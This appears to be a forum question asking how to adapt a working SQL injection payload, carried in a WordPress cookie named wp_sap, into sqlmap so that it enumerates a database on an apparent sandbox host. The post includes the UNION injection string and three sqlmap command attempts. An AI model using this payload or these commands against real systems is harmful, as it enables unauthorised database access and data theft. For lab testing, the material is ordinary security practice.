I'm using an existing exploit which calls for a cookie called wp_sap
to be set with the following value:
["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]
This works great manually. Now, I'd like to be able to use this within SQLMap to enumerate the database automatically but have been struggling. I've tried the following variations to no avail.
sqlmap --cookie "wp_sap=[\"1650149780')) OR 1=2 " -u http://sandbox.local -p "wp_sap" --dbms "MariaDB" --suffix "#]" --level 5 --technique U -proxy http://127.0.0.1:8080
sqlmap --cookie="wp_sap=*" -u http://sandbox.local -p "wp_sap" --dbms="MariaDB" --prefix "[\"1650149780')) OR 1=2" --suffix "11#]" --level 5 --technique U -proxy http://127.0.0.1:8080
sqlmap --cookie="wp_sap=[\"1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,*" -u http://sandbox.local -p "wp_sap" --dbms="MariaDB" --suffix ",11#]" --level 5 --technique U -proxy http://127.0.0.1:8080
I'd really appreciate some help to get this working.